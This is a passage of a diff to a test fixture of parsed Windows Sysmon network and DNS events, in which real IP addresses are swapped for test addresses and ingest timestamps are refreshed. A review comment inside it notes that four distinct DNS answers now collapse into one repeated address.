Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e40.77.226.250\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e443\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ehttps\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e11\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.214\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccaa-5c8f-0000-0010b4e22700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1600\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003cData Name='User'\u003eVAGRANT-2012-R2\\vagrant\u003c/Data\u003e\u003cData Name='Protocol'\u003etcp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData 
Name='SourcePort'\u003e1139\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e443\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ehttps\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-03-18T16:57:49.340Z", @@ -8017,17 +7932,17 @@ "type": "CNAME" }, { - "data": "23.50.53.179", + "data": "89.160.20.156", "type": "A" }, { - "data": "23.50.53.177", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.50.53.179", - "23.50.53.177" + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
@@ -8044,14 +7959,13 @@ "ocsp.int-x3.letsencrypt.org" ], "ip": [ - "23.50.53.179", - "23.50.53.177" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313838096Z", + "ingested": "2021-12-09T13:49:44.739474100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802753800Z'/\u003e\u003cEventRecordID\u003e124\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.468\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.int-x3.letsencrypt.org\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.int-x3.letsencrypt.org.edgesuite.net;type: 5 a771.dscq.akamai.net;::ffff:23.50.53.179;::ffff:23.50.53.177;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802753800Z'/\u003e\u003cEventRecordID\u003e124\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.468\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.int-x3.letsencrypt.org\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.int-x3.letsencrypt.org.edgesuite.net;type: 5 a771.dscq.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -8115,11 +8029,11 @@ "type": "CNAME" }, { - "data": "172.217.12.195", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -8127,7 +8041,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -8135,7 +8049,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { 
@@ -8143,7 +8057,7 @@
 "type": "AAAA"
 },
 {
- "data": "192.31.80.30",
+ "data": "192.168.80.30",
 "type": "A"
 },
 {
@@ -8151,21 +8065,21 @@
 "type": "AAAA"
 },
 {
- "data": "192.12.94.30",
+ "data": "192.168.94.30",
 "type": "A"
 }
 ],
 "resolved_ip": [
- "172.217.12.195",
- "192.5.6.30",
+ "89.160.20.156",
+ "192.168.6.30",
 "2001:503:a83e::2:30",
- "192.33.14.30",
+ "192.168.14.30",
 "2001:503:231d::2:30",
- "192.26.92.30",
+ "192.168.92.30",
 "2001:503:83eb::30",
- "192.31.80.30",
+ "192.168.80.30",
 "2001:500:856e::30",
- "192.12.94.30"
+ "192.168.94.30"
 ]
 },
 "network": {
@@ -8181,22 +8095,22 @@ "ocsp.pki.goog" ], "ip": [ - "172.217.12.195", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313839415Z", + "ingested": "2021-12-09T13:49:44.739480Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802768300Z'/\u003e\u003cEventRecordID\u003e125\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.581\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.pki.goog\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pki-goog.l.google.com;::ffff:172.217.12.195;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData 
Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802768300Z'/\u003e\u003cEventRecordID\u003e125\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.581\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.pki.goog\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pki-goog.l.google.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", 
@@ -8271,7 +8185,7 @@ ] }, "event": { - "ingested": "2021-10-14T04:10:32.313840767Z", + "ingested": "2021-12-09T13:49:44.739483800Z", "code": "3", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e12\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.250\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e10.0.2.255\u003c/Data\u003e\u003cData 
Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -8339,12 +8253,12 @@ "type": "CNAME" }, { - "data": "172.217.10.34", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "172.217.10.34" + "89.160.20.156" ] }, "network": { 
@@ -8360,13 +8274,13 @@ "googleads4.g.doubleclick.net" ], "ip": [ - "172.217.10.34" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313842086Z", + "ingested": "2021-12-09T13:49:44.739488300Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029828800Z'/\u003e\u003cEventRecordID\u003e126\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.872\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003egoogleads4.g.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead.l.doubleclick.net;::ffff:172.217.10.34;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029828800Z'/\u003e\u003cEventRecordID\u003e126\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.872\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003egoogleads4.g.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead.l.doubleclick.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.029Z", 
@@ -8448,7 +8362,7 @@ ] }, "event": { - "ingested": "2021-10-14T04:10:32.313843519Z", + "ingested": "2021-12-09T13:49:44.739493400Z", "code": "3", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e13\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.250\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.255\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData 
Name='DestinationHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -8516,27 +8430,27 @@ "type": "CNAME" }, { - "data": "151.101.2.2", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.66.2", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.130.2", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.194.2", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "151.101.2.2", - "151.101.66.2", - "151.101.130.2", - "151.101.194.2" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
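Review bot: In the `dns.answers` block of hunk `@@ -8516` all four distinct A records (`151.101.2.2` through `151.101.194.2`) are replaced by the single address `89.160.20.156`, so `dns.resolved_ip` now holds the same value four times and the multi-answer case this fixture used to exercise is gone. The following hunk `@@ -8552` shows `related.ip` collapsing to one element while `dns.resolved_ip` keeps the duplicates, so the expected output now also pins that asymmetry between the two fields as correct behaviour. This appears to be a regenerated expected-output file (every `event.ingested` timestamp is refreshed), so the fix belongs in the test input rather than here: give the four answers four different addresses from the supported subset and regenerate, so each `data` entry and each `resolved_ip` element stays unique.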
@@ -8552,16 +8466,13 @@ "images.taboola.com" ], "ip": [ - "151.101.2.2", - "151.101.66.2", - "151.101.130.2", - "151.101.194.2" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313844976Z", + "ingested": "2021-12-09T13:49:44.739498700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029851300Z'/\u003e\u003cEventRecordID\u003e127\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.889\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eimages.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.taboola.map.fastly.net;::ffff:151.101.2.2;::ffff:151.101.66.2;::ffff:151.101.130.2;::ffff:151.101.194.2;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029851300Z'/\u003e\u003cEventRecordID\u003e127\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.889\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eimages.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.taboola.map.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.029Z", 
@@ -8637,7 +8548,7 @@ ] }, "event": { - "ingested": "2021-10-14T04:10:32.313846392Z", + "ingested": "2021-12-09T13:49:44.739502500Z", "code": "3", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e14\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.250\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIp'\u003efe80:0:0:0:e488:b85c:5262:ff86\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e55542\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003etrue\u003c/Data\u003e\u003cData 
